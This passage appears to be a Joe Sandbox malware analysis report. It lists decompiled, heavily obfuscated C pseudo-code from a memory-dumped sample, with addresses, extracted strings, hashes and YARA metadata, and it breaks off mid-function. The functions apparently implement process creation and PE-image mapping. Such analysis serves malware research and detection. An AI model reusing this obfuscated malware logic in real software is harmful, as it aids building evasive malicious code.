String ID: @0$_sC$a>$ms2$pj$q\1$v*${*
API String ID: 0-3081288078
Opcode ID: f8a2e113b5d9dda679cf57cf0f54e04b844d79b455d6c62f2827183395ef3e58
Instruction ID: 8c8994ca5163defc24238574b7d4244dbbed808d54bdd57dc0b5ca264da63b72
Opcode Fuzzy Hash: f8a2e113b5d9dda679cf57cf0f54e04b844d79b455d6c62f2827183395ef3e58
Instruction Fuzzy Hash: 480252715083809FD3A8CF65C48AA5BBBE1FBC4758F10894DF6DA8A260D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 02B546BD, Relevance: 10.3, Strings: 8, Instructions: 293
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E02B546BD(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t316;
				intOrPtr _t339;
				intOrPtr* _t341;
				void* _t343;
				intOrPtr* _t346;
				void* _t348;
				intOrPtr* _t349;
				void* _t351;
				intOrPtr _t367;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				void* _t375;
				void* _t376;

				_t369 = _a16;
				_t349 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02B4FE29(_t316);
				_v16 = 0xd9d351;
				_t367 = 0;
				_v12 = 0x17e122;
				_t376 = _t375 + 0x18;
				_v8 = 0;
				_v96 = 0xcc9d59;
				_t351 = 0xff449f4;
				_v96 = _v96 << 0xc;
				_v96 = _v96 + 0x162d;
				_v96 = _v96 ^ 0xc9d5a62c;
				_v132 = 0x3cc17f;
				_v132 = _v132 + 0xffff84d9;
				_t370 = 0x52;
				_v132 = _v132 * 0x3d;
				_v132 = _v132 << 0xf;
				_v132 = _v132 ^ 0x617c0001;
				_v48 = 0x63951b;
				_v48 = _v48 >> 7;
				_v48 = _v48 ^ 0x0000c72a;
				_v64 = 0xbc1395;
				_v64 = _v64 >> 0xd;
				_v64 = _v64 ^ 0x000005e0;
				_v80 = 0x50b5ee;
				_v80 = _v80 + 0xf34;
				_v80 = _v80 >> 1;
				_v80 = _v80 ^ 0x00286291;
				_v92 = 0x9715d8;
				_v92 = _v92 * 0x46;
				_v92 = _v92 << 0xd;
				_v92 = _v92 ^ 0xff220000;
				_v52 = 0xfde3f2;
				_v52 = _v52 + 0xa710;
				_v52 = _v52 ^ 0x00fe8b02;
				_v160 = 0x198337;
				_v160 = _v160 + 0xffff007e;
				_v160 = _v160 << 0x10;
				_v160 = _v160 ^ 0x69569842;
				_v160 = _v160 ^ 0xeaeb46e9;
				_v28 = 0xcc69bd;
				_v28 = _v28 ^ 0xeecfab9f;
				_v28 = _v28 ^ 0xee01123b;
				_v136 = 0x76b317;
				_v136 = _v136 / _t370;
				_v136 = _v136 + 0xffff81f3;
				_v136 = _v136 << 3;
				_v136 = _v136 ^ 0x00064d41;
				_v112 = 0x80a4bd;
				_v112 = _v112 * 0x13;
				_v112 = _v112 << 0xa;
				_v112 = _v112 + 0xcad4;
				_v112 = _v112 ^ 0x30efc400;
				_v144 = 0x82a288;
				_v144 = _v144 << 2;
				_v144 = _v144 >> 0xe;
				_v144 = _v144 << 9;
				_v144 = _v144 ^ 0x0011be13;
				_v56 = 0x7edd30;
				_v56 = _v56 * 0x55;
				_v56 = _v56 ^ 0x2a184bb4;
				_v88 = 0xe2a415;
				_t371 = 6;
				_v88 = _v88 * 0x2a;
				_v88 = _v88 + 0xffff5f32;
				_v88 = _v88 ^ 0x252ac732;
				_v128 = 0xe004bc;
				_v128 = _v128 ^ 0x574173bd;
				_v128 = _v128 >> 9;
				_v128 = _v128 ^ 0xd8221cc5;
				_v128 = _v128 ^ 0xd803a3d4;
				_v152 = 0x516ea5;
				_v152 = _v152 + 0xffff4486;
				_v152 = _v152 | 0x140257d0;
				_v152 = _v152 >> 0xf;
				_v152 = _v152 ^ 0x00051039;
				_v120 = 0x9f4975;
				_v120 = _v120 ^ 0x86b89632;
				_v120 = _v120 * 0x24;
				_v120 = _v120 | 0x1b5f0b87;
				_v120 = _v120 ^ 0xdfd1de63;
				_v36 = 0xa5f8e9;
				_v36 = _v36 + 0x714e;
				_v36 = _v36 ^ 0x00af22d8;
				_v44 = 0x824fdb;
				_v44 = _v44 + 0xffff91e5;
				_v44 = _v44 ^ 0x008fd473;
				_v68 = 0x680ab0;
				_v68 = _v68 + 0xbc39;
				_v68 = _v68 / _t371;
				_v68 = _v68 ^ 0x001a68c1;
				_v76 = 0x17a4af;
				_v76 = _v76 >> 0xb;
				_t372 = 0x5b;
				_v76 = _v76 / _t372;
				_v76 = _v76 ^ 0x0007f211;
				_v84 = 0x315e60;
				_v84 = _v84 + 0x702b;
				_v84 = _v84 + 0xffff10cc;
				_v84 = _v84 ^ 0x003e64ec;
				_v100 = 0x9cc34d;
				_v100 = _v100 | 0x947c2ff5;
				_t373 = 0x3a;
				_v100 = _v100 / _t373;
				_v100 = _v100 ^ 0x02979c4b;
				_v140 = 0xbfeff4;
				_v140 = _v140 ^ 0x822e0370;
				_v140 = _v140 + 0xf2f6;
				_v140 = _v140 | 0x96ab8507;
				_v140 = _v140 ^ 0x96bf89b8;
				_v60 = 0xfd95c4;
				_v60 = _v60 << 3;
				_v60 = _v60 ^ 0x07e16726;
				_v148 = 0x38036;
				_v148 = _v148 ^ 0x54103d5f;
				_v148 = _v148 | 0x54303272;
				_t206 =  &_v148; // 0x54303272
				_v148 =  *_t206;
				_v148 = _v148 ^ 0x5432cd2c;
				_v40 = 0xc550eb;
				_v40 = _v40 | 0x63f29c9e;
				_v40 = _v40 ^ 0x63f29262;
				_v32 = 0xf7791b;
				_v32 = _v32 * 0x51;
				_v32 = _v32 ^ 0x4e4d9c2b;
				_v156 = 0xdcae59;
				_v156 = _v156 + 0xffffc6cd;
				_v156 = _v156 + 0xfffffd52;
				_v156 = _v156 ^ 0x46382038;
				_v156 = _v156 ^ 0x46e78b29;
				_v72 = 0xac5d66;
				_v72 = _v72 | 0xb655dd15;
				_v72 = _v72 + 0xffff07b1;
				_v72 = _v72 ^ 0xb6f51c6c;
				_v104 = 0x2e3a8e;
				_v104 = _v104 | 0xfac334a1;
				_v104 = _v104 << 4;
				_v104 = _v104 ^ 0xaefe5277;
				_v108 = 0xcd35f0;
				_v108 = _v108 << 0xf;
				_v108 = _v108 | 0xf31160b4;
				_v108 = _v108 ^ 0xc3cc8d90;
				_v108 = _v108 ^ 0x3831362e;
				_v116 = 0x7e4b3f;
				_v116 = _v116 << 9;
				_v116 = _v116 + 0xa646;
				_v116 = _v116 + 0x5b3c;
				_v116 = _v116 ^ 0xfc982242;
				_v124 = 0x9fd9df;
				_v124 = _v124 >> 6;
				_v124 = _v124 << 0xf;
				_v124 = _v124 << 1;
				_v124 = _v124 ^ 0x7f607f7f;
				do {
					while(_t351 != 0x8274db) {
						if(_t351 == 0x30c1656) {
							_push(_t351);
							_push(_t351);
							_t339 = E02B3C5D8(_v20);
							_t376 = _t376 + 0xc;
							_v24 = _t339;
							if(_t339 != 0) {
								_t351 = 0x6ee5562;
								continue;
							}
						} else {
							if(_t351 == 0x6ee5562) {
								_t341 =  *0x2b56224; // 0x0
								_t343 = E02B511B0(_v84, _t351, _v92, _v100, _v132, _v140, _v60, _v148, _v20,  *_t369, _v40,  *((intOrPtr*)(_t369 + 4)), _v32,  &_v20, _v156, _v72, _v24,  *_t341, _v104);
								_t376 = _t376 + 0x48;
								if(_t343 == _v52) {
									 *_t349 = _v24;
									_t367 = 1;
									 *((intOrPtr*)(_t349 + 4)) = _v20;
								} else {
									_t351 = 0x8274db;
									continue;
								}
							} else {
								if(_t351 == 0xc41b31c) {
									_t346 =  *0x2b56224; // 0x0
									_t348 = E02B511B0(_v160, _t351, _v48, _v28, _v96, _v136, _v112, _v144, _v64,  *_t369, _v56,  *((intOrPtr*)(_t369 + 4)), _v88,  &_v20, _v128, _v152, _t367,  *_t346, _v120);
									_t376 = _t376 + 0x48;
									if(_t348 == _v80) {
										_t351 = 0x30c1656;
										continue;
									}
								} else {
									if(_t351 != 0xff449f4) {
										goto L14;
									} else {
										_t351 = 0xc41b31c;
										continue;
									}
								}
							}
						}
						L17:
						return _t367;
					}
					E02B52B09(_v108, _v24, _v116, _v124);
					_t351 = 0xc0b2195;
					L14:
				} while (_t351 != 0xc0b2195);
				goto L17;
			}

0x02b546c6
0x02b546cd
0x02b546d0
0x02b546d1
0x02b546d8
0x02b546df
0x02b546e6
0x02b546e7
0x02b546e8
0x02b546ed
0x02b546f8
0x02b546fa
0x02b54705
0x02b54708
0x02b54711
0x02b54719
0x02b5471e
0x02b54723
0x02b5472b
0x02b54733
0x02b5473b
0x02b5474a
0x02b5474b
0x02b5474f
0x02b54754
0x02b5475c
0x02b54767
0x02b5476f
0x02b5477a
0x02b54782
0x02b54787
0x02b5478f
0x02b54797
0x02b5479f
0x02b547a3
0x02b547ab
0x02b547b8
0x02b547bc
0x02b547c1
0x02b547c9
0x02b547d4
0x02b547df
0x02b547ea
0x02b547f2
0x02b547fa
0x02b547ff
0x02b54807
0x02b5480f
0x02b5481a
0x02b54825
0x02b54830
0x02b5483e
0x02b54842
0x02b5484a
0x02b5484f
0x02b54857
0x02b54864
0x02b54868
0x02b5486d
0x02b54875
0x02b5487d
0x02b54885
0x02b5488a
0x02b5488f
0x02b54894
0x02b5489c
0x02b548a9
0x02b548ad
0x02b548b5
0x02b548c6
0x02b548c9
0x02b548cd
0x02b548d5
0x02b548dd
0x02b548e5
0x02b548ed
0x02b548f2
0x02b548fa
0x02b54902
0x02b5490a
0x02b54912
0x02b5491a
0x02b5491f
0x02b54927
0x02b5492f
0x02b5493c
0x02b54940
0x02b54948
0x02b54950
0x02b5495b
0x02b54966
0x02b54971
0x02b5497c
0x02b54987
0x02b54992
0x02b5499a
0x02b549aa
0x02b549ae
0x02b549b6
0x02b549be
0x02b549c7
0x02b549cc
0x02b549d2
0x02b549da
0x02b549e2
0x02b549ea
0x02b549f2
0x02b549fa
0x02b54a02
0x02b54a0e
0x02b54a11
0x02b54a15
0x02b54a1d
0x02b54a25
0x02b54a2d
0x02b54a35
0x02b54a3d
0x02b54a45
0x02b54a4d
0x02b54a52
0x02b54a5a
0x02b54a62
0x02b54a6a
0x02b54a72
0x02b54a76
0x02b54a7a
0x02b54a82
0x02b54a8d
0x02b54a98
0x02b54aa3
0x02b54ab6
0x02b54abd
0x02b54ac8
0x02b54ad0
0x02b54ad8
0x02b54ae0
0x02b54aed
0x02b54af5
0x02b54afd
0x02b54b05
0x02b54b0d
0x02b54b15
0x02b54b1d
0x02b54b25
0x02b54b2a
0x02b54b32
0x02b54b3a
0x02b54b3f
0x02b54b47
0x02b54b4f
0x02b54b57
0x02b54b5f
0x02b54b64
0x02b54b6c
0x02b54b74
0x02b54b7c
0x02b54b84
0x02b54b89
0x02b54b8e
0x02b54b92
0x02b54b9a
0x02b54b9a
0x02b54ba8
0x02b54cdd
0x02b54cde
0x02b54ce6
0x02b54ceb
0x02b54cee
0x02b54cf7
0x02b54cf9
0x00000000
0x02b54cf9
0x02b54bae
0x02b54bb4
0x02b54c4e
0x02b54caf
0x02b54cb4
0x02b54cbe
0x02b54d39
0x02b54d3b
0x02b54d43
0x02b54cc0
0x02b54cc0
0x00000000
0x02b54cc0
0x02b54bba
0x02b54bc0
0x02b54bd9
0x02b54c2e
0x02b54c33
0x02b54c3a
0x02b54c40
0x00000000
0x02b54c40
0x02b54bc2
0x02b54bc8
0x00000000
0x02b54bce
0x02b54bce
0x00000000
0x02b54bce
0x02b54bc8
0x02b54bc0
0x02b54bb4
0x02b54d46
0x02b54d52
0x02b54d52
0x02b54d16
0x02b54d1d
0x02b54d22
0x02b54d22
0x00000000

Strings

<[, xrefs: 02B54B6C
F, xrefs: 02B54807
r20T, xrefs: 02B54A72
?K~, xrefs: 02B54B57
Nq, xrefs: 02B5495B
.618, xrefs: 02B54B4F
d>, xrefs: 02B549F2
8 8F, xrefs: 02B54AE0

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: .618$8 8F$<[$?K~$Nq$r20T$F$d>
API String ID: 0-914106314
Opcode ID: aeb0ca6904a9a9d6a5430ff8320bf92a8d1216122c22d5de03a25fe9b7ffee45
Instruction ID: 2dfb417a4e10c3346cd271f3edcde889949acc5826d06ff6aef5cd186547f281
Opcode Fuzzy Hash: aeb0ca6904a9a9d6a5430ff8320bf92a8d1216122c22d5de03a25fe9b7ffee45
Instruction Fuzzy Hash: 6DF1EE71009380DFD769CF61C989A5BBBF1FB85748F108A1DE2DA86260D7B68948CF03

Uniqueness

Uniqueness Score: -1.00%

Function 02B4017B, Relevance: 10.3, Strings: 8, Instructions: 263
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E02B4017B(void* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v60;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _t272;
				void* _t295;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				void* _t312;
				void* _t334;
				intOrPtr _t335;
				signed int* _t338;

				_push(_a32);
				_t334 = __ecx;
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				_push(__ecx);
				_t272 = E02B4FE29(0);
				_v84 = _t272;
				_t338 =  &(( &_v196)[0xa]);
				_v72 = _t272;
				_t335 = _t272;
				_v80 = 0x49e87b;
				_v76 = 0xc5c8e1;
				_t312 = 0x7956bd9;
				_v96 = 0x2d2511;
				_t305 = 0x6f;
				_v96 = _v96 / _t305;
				_v96 = _v96 ^ 0x00006c1e;
				_v192 = 0x2be237;
				_t22 =  &_v192; // 0x2be237
				_t306 = 0x35;
				_v192 =  *_t22 * 0x2a;
				_v192 = _v192 ^ 0x8f196f07;
				_v192 = _v192 ^ 0x2da4b7e5;
				_v192 = _v192 ^ 0xa58ec5c4;
				_v172 = 0x207d98;
				_v172 = _v172 ^ 0x972b32db;
				_v172 = _v172 | 0x9c7c4c28;
				_v172 = _v172 * 0x48;
				_v172 = _v172 ^ 0xdbcfdb8a;
				_v100 = 0x57c7e;
				_v100 = _v100 + 0xffffdd89;
				_v100 = _v100 ^ 0x000aed2d;
				_v124 = 0x64cad1;
				_v124 = _v124 + 0xffff2d5b;
				_v124 = _v124 << 4;
				_v124 = _v124 ^ 0x063cb223;
				_v148 = 0xd38c19;
				_v148 = _v148 >> 7;
				_v148 = _v148 >> 0xf;
				_v148 = _v148 ^ 0x0008e1ac;
				_v88 = 0xe6598d;
				_v88 = _v88 ^ 0xb40d33dc;
				_v88 = _v88 ^ 0xb4eaaa1c;
				_v92 = 0x85b818;
				_v92 = _v92 + 0xffffc4c3;
				_v92 = _v92 ^ 0x008e2283;
				_v104 = 0x6cafca;
				_v104 = _v104 * 0x73;
				_v104 = _v104 ^ 0x30d8f33f;
				_v120 = 0xea107;
				_v120 = _v120 / _t306;
				_v120 = _v120 ^ 0x000228b8;
				_v112 = 0x4bcc54;
				_v112 = _v112 * 0x3f;
				_v112 = _v112 ^ 0x12af13c7;
				_v176 = 0x25f352;
				_v176 = _v176 * 0x1d;
				_t307 = 0x55;
				_v176 = _v176 / _t307;
				_v176 = _v176 + 0xa166;
				_v176 = _v176 ^ 0x00018b34;
				_v168 = 0x70163a;
				_v168 = _v168 | 0xb665b778;
				_v168 = _v168 + 0xffff15cb;
				_v168 = _v168 + 0xffff931b;
				_v168 = _v168 ^ 0xb6787764;
				_v184 = 0xfb3451;
				_t308 = 0x2f;
				_v184 = _v184 * 0x55;
				_v184 = _v184 + 0xffff75a5;
				_v184 = _v184 * 0x5c;
				_v184 = _v184 ^ 0xf953722f;
				_v160 = 0x3448db;
				_v160 = _v160 | 0x0a9a3806;
				_v160 = _v160 + 0xffffbb3e;
				_v160 = _v160 << 6;
				_v160 = _v160 ^ 0xaf82d104;
				_v108 = 0x7f4bc6;
				_v108 = _v108 * 0x47;
				_v108 = _v108 ^ 0x234271fe;
				_v116 = 0x137e80;
				_v116 = _v116 << 7;
				_v116 = _v116 ^ 0x09bed852;
				_v140 = 0x58b738;
				_v140 = _v140 >> 3;
				_v140 = _v140 / _t308;
				_v140 = _v140 ^ 0x0006291c;
				_v152 = 0x1dae44;
				_v152 = _v152 + 0xb010;
				_t309 = 0x7a;
				_v152 = _v152 / _t309;
				_v152 = _v152 ^ 0x0004435a;
				_v136 = 0x3e9c6a;
				_v136 = _v136 + 0xffff4267;
				_v136 = _v136 + 0xa013;
				_v136 = _v136 ^ 0x00313444;
				_v128 = 0xfc4661;
				_v128 = _v128 ^ 0x84ef8931;
				_v128 = _v128 >> 6;
				_v128 = _v128 ^ 0x021c54a7;
				_v144 = 0x2fd65c;
				_v144 = _v144 | 0x65ad1a2d;
				_v144 = _v144 ^ 0x87299bd7;
				_v144 = _v144 ^ 0xe281bdf5;
				_v180 = 0x40c6e5;
				_v180 = _v180 + 0xffff5f75;
				_v180 = _v180 + 0x6863;
				_v180 = _v180 << 0xc;
				_v180 = _v180 ^ 0x08e53add;
				_v132 = 0x50fbcf;
				_v132 = _v132 | 0xda091e24;
				_v132 = _v132 + 0xffffc3f6;
				_v132 = _v132 ^ 0xda5ae4d8;
				_v188 = 0x29fd87;
				_v188 = _v188 | 0x249d2c08;
				_v188 = _v188 << 1;
				_v188 = _v188 | 0xc4033418;
				_v188 = _v188 ^ 0xcd7b5999;
				_v196 = 0x78de76;
				_v196 = _v196 * 0x7c;
				_v196 = _v196 + 0xffff171c;
				_v196 = _v196 >> 5;
				_v196 = _v196 ^ 0x01d3afb7;
				_v156 = 0x2e37f5;
				_v156 = _v156 + 0xffff32dd;
				_v156 = _v156 >> 1;
				_v156 = _v156 * 0x73;
				_v156 = _v156 ^ 0x0a367c41;
				_v164 = 0x79bcb0;
				_v164 = _v164 + 0x8106;
				_v164 = _v164 + 0x4469;
				_v164 = _v164 + 0xffff19e3;
				_v164 = _v164 ^ 0x007fae8c;
				do {
					while(_t312 != 0x59e10b1) {
						if(_t312 == 0x7956bd9) {
							_t312 = 0x84e17ac;
							continue;
						} else {
							if(_t312 == 0x84e17ac) {
								_t264 =  &_v84; // 0x49e87b
								_t267 =  &_v172; // 0xa367c41
								_t295 = E02B44178( *_t267, _v100, _t264, _a20, _v124);
								_t338 =  &(_t338[4]);
								__eflags = _t295;
								if(_t295 != 0) {
									_t312 = 0x9148c69;
									continue;
								}
							} else {
								_t344 = _t312 - 0x9148c69;
								if(_t312 != 0x9148c69) {
									goto L10;
								} else {
									E02B4FE2A(_v148, _v88, 0x44,  &_v68);
									_push(_v112);
									_v68 = 0x44;
									_push(_v120);
									_push(_v104);
									_v60 = E02B4E1F8(0x2b31224, _v92, _t344);
									_t335 = E02B3473D(_a20, _v176, _v168, 0x2b31224, 0x2b31224, _v184, _v160, 0, _a24, _v108, _t334, _v116, _v140, _v152, _v84, 0x2b31224, _v136, _v128, _v144, _v192 | _v96,  &_v68);
									E02B4FECB(_v60, _v180, _v132, _v188, _v196);
									_t338 =  &(_t338[0x1c]);
									_t312 = 0x59e10b1;
									continue;
								}
							}
						}
						goto L11;
					}
					_t269 =  &_v84; // 0x49e87b
					E02B47952(_v156,  *_t269, _v164);
					_t312 = 0xf5fdc0f;
					L10:
					__eflags = _t312 - 0xf5fdc0f;
				} while (_t312 != 0xf5fdc0f);
				L11:
				return _t335;
			}

0x02b40185
0x02b4018e
0x02b40190
0x02b40197
0x02b4019e
0x02b401a5
0x02b401ac
0x02b401b3
0x02b401b4
0x02b401bb
0x02b401bc
0x02b401bd
0x02b401c2
0x02b401c9
0x02b401cc
0x02b401d3
0x02b401d5
0x02b401e2
0x02b401ed
0x02b401f2
0x02b40200
0x02b40205
0x02b4020b
0x02b40213
0x02b4021b
0x02b40220
0x02b40221
0x02b40225
0x02b4022d
0x02b40235
0x02b4023d
0x02b40245
0x02b4024d
0x02b4025a
0x02b4025e
0x02b40266
0x02b4026e
0x02b40276
0x02b4027e
0x02b40286
0x02b4028e
0x02b40293
0x02b4029b
0x02b402a3
0x02b402a8
0x02b402ad
0x02b402b5
0x02b402bd
0x02b402c5
0x02b402cd
0x02b402d5
0x02b402dd
0x02b402e5
0x02b402f2
0x02b402f6
0x02b402fe
0x02b4030c
0x02b40310
0x02b40318
0x02b40325
0x02b40329
0x02b40331
0x02b4033e
0x02b4034a
0x02b4034f
0x02b40355
0x02b4035d
0x02b40365
0x02b4036d
0x02b40375
0x02b4037d
0x02b40385
0x02b4038d
0x02b4039a
0x02b4039d
0x02b403a1
0x02b403ae
0x02b403b2
0x02b403ba
0x02b403c2
0x02b403ca
0x02b403d2
0x02b403d7
0x02b403df
0x02b403ec
0x02b403f0
0x02b403f8
0x02b40400
0x02b40405
0x02b4040d
0x02b40415
0x02b40422
0x02b40426
0x02b4042e
0x02b40436
0x02b40442
0x02b40445
0x02b40449
0x02b40451
0x02b40459
0x02b40461
0x02b40469
0x02b40471
0x02b40479
0x02b40481
0x02b40486
0x02b4048e
0x02b40496
0x02b4049e
0x02b404a6
0x02b404ae
0x02b404b6
0x02b404be
0x02b404c6
0x02b404cb
0x02b404d3
0x02b404db
0x02b404e3
0x02b404eb
0x02b404f3
0x02b404fb
0x02b40503
0x02b40507
0x02b4050f
0x02b40517
0x02b40524
0x02b40528
0x02b40530
0x02b40535
0x02b4053d
0x02b4054a
0x02b40557
0x02b40560
0x02b40564
0x02b4056c
0x02b40574
0x02b4057c
0x02b40584
0x02b4058c
0x02b40594
0x02b40594
0x02b405a6
0x02b406c4
0x00000000
0x02b405ac
0x02b405ae
0x02b4069a
0x02b406ad
0x02b406b1
0x02b406b6
0x02b406b9
0x02b406bb
0x02b406bd
0x00000000
0x02b406bd
0x02b405b4
0x02b405b4
0x02b405b6
0x00000000
0x02b405bc
0x02b405ce
0x02b405d3
0x02b405dc
0x02b405e7
0x02b405eb
0x02b405fe
0x02b4066c
0x02b40684
0x02b40689
0x02b4068c
0x00000000
0x02b4068c
0x02b405b6
0x02b405ae
0x00000000
0x02b405a6
0x02b406cf
0x02b406da
0x02b406e0
0x02b406e5
0x02b406e5
0x02b406e5
0x02b406f2
0x02b406fd

Strings

D41, xrefs: 02B40469
7+, xrefs: 02B4021B
D, xrefs: 02B405DC
ch, xrefs: 02B404BE
-, xrefs: 02B40276
iD, xrefs: 02B4057C
{I, xrefs: 02B4069A, 02B406A8
A|6, xrefs: 02B406AD

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: -$7+$A|6$D$D41$ch$iD${I
API String ID: 0-1622838380
Opcode ID: d38bd9cfa21679b86ab3da38e8b427c1b46b79d23875551d12ca9b566b6c8856
Instruction ID: 56d682425ed9c171ce70116a4f01e675e9657b14d01401c2b01c144050a96368
Opcode Fuzzy Hash: d38bd9cfa21679b86ab3da38e8b427c1b46b79d23875551d12ca9b566b6c8856
Instruction Fuzzy Hash: 37D1FDB25083819FD368CF61C889A1BFBF1FBC5358F508A1DF69596260D7B58948DF02

Uniqueness

Uniqueness Score: -1.00%

Function 02B53263, Relevance: 10.2, Strings: 8, Instructions: 175
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E02B53263(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t171;
				void* _t188;
				void* _t198;
				void* _t200;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				void* _t233;
				void* _t238;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;

				_push(_a16);
				_t240 = _a4;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02B4FE29(_t171);
				_v52 = 0x577e5f;
				_v52 = _v52 >> 2;
				_v52 = _v52 >> 2;
				_t202 = 0x5a;
				_v52 = _v52 / _t202;
				_v52 = _v52 ^ 0x00001f8d;
				_v56 = 0xc1a783;
				_v56 = _v56 | 0xd091f394;
				_t203 = 0x7d;
				_v56 = _v56 / _t203;
				_v56 = _v56 >> 0xa;
				_v56 = _v56 ^ 0x00004aea;
				_v36 = 0x5ab329;
				_v36 = _v36 | 0xfb978afd;
				_v36 = _v36 << 0xc;
				_v36 = _v36 << 5;
				_v36 = _v36 ^ 0x77fa0040;
				_v60 = 0xfb6851;
				_t204 = 0x5f;
				_v60 = _v60 / _t204;
				_v60 = _v60 + 0xffff827f;
				_v60 = _v60 + 0xffffffdf;
				_v60 = _v60 ^ 0x000cafd7;
				_v24 = 0xe59b9d;
				_v24 = _v24 + 0x8cf1;
				_v24 = _v24 << 0xd;
				_v24 = _v24 ^ 0xc51da5fe;
				_v40 = 0x4a3359;
				_v40 = _v40 + 0xb1f1;
				_v40 = _v40 ^ 0xc176e2ad;
				_v40 = _v40 << 0xb;
				_v40 = _v40 ^ 0xe0393f27;
				_v44 = 0x442ad8;
				_v44 = _v44 + 0xffffa8db;
				_v44 = _v44 ^ 0xa2d0149a;
				_v44 = _v44 | 0x2bbd0b31;
				_v44 = _v44 ^ 0xabb0f764;
				_v20 = 0x80424;
				_v20 = _v20 + 0xffff6539;
				_v20 = _v20 + 0xd5f9;
				_v20 = _v20 ^ 0x000cf2ae;
				_v48 = 0x677157;
				_v48 = _v48 + 0xec21;
				_v48 = _v48 ^ 0x036b165d;
				_t205 = 0x14;
				_v48 = _v48 / _t205;
				_v48 = _v48 ^ 0x002fc559;
				_v16 = 0xa7ae7b;
				_v16 = _v16 | 0x7198ce36;
				_v16 = _v16 << 1;
				_v16 = _v16 ^ 0xe373c07b;
				_v32 = 0xbd3d32;
				_v32 = _v32 | 0x84fa4a87;
				_v32 = _v32 * 0xf;
				_t206 = 0x34;
				_v32 = _v32 * 0x4e;
				_v32 = _v32 ^ 0xd7bdec0b;
				_v8 = 0x4158ae;
				_v8 = _v8 / _t206;
				_v8 = _v8 ^ 0x000847ec;
				_v28 = 0x8e7645;
				_v28 = _v28 + 0xffff0216;
				_v28 = _v28 + 0x7276;
				_t207 = 0x60;
				_v28 = _v28 * 0x4a;
				_v28 = _v28 ^ 0x290f0829;
				_v4 = 0x80a154;
				_v4 = _v4 ^ 0x762c831e;
				_v4 = _v4 ^ 0x76a70d93;
				_v12 = 0x206e81;
				_v12 = _v12 / _t207;
				_v12 = _v12 + 0xffffa107;
				_v12 = _v12 ^ 0xffff9c06;
				_t208 = _v60;
				_t188 = E02B5287F(_v60, _a4, _v24);
				_t198 = _t188;
				_t242 =  &(( &_v60)[7]);
				if(_t198 != 0) {
					_t233 = E02B462C7( *((intOrPtr*)(_t198 + 0x50)), _v36, _v40, _t208, _v44, _v20, _v48, _v56 | _v52);
					_t243 =  &(_t242[6]);
					if(_t233 == 0) {
						L6:
						return _t233;
					}
					E02B4C9B0(_v16, _t233, _v32,  *((intOrPtr*)(_t198 + 0x54)),  *_t240, _v8);
					_t244 =  &(_t243[4]);
					_t238 = ( *(_t198 + 0x14) & 0x0000ffff) + 0x18 + _t198;
					_t200 = ( *(_t198 + 6) & 0x0000ffff) * 0x28 + _t238;
					while(_t238 < _t200) {
						_t196 =  <  ?  *((void*)(_t238 + 8)) :  *((intOrPtr*)(_t238 + 0x10));
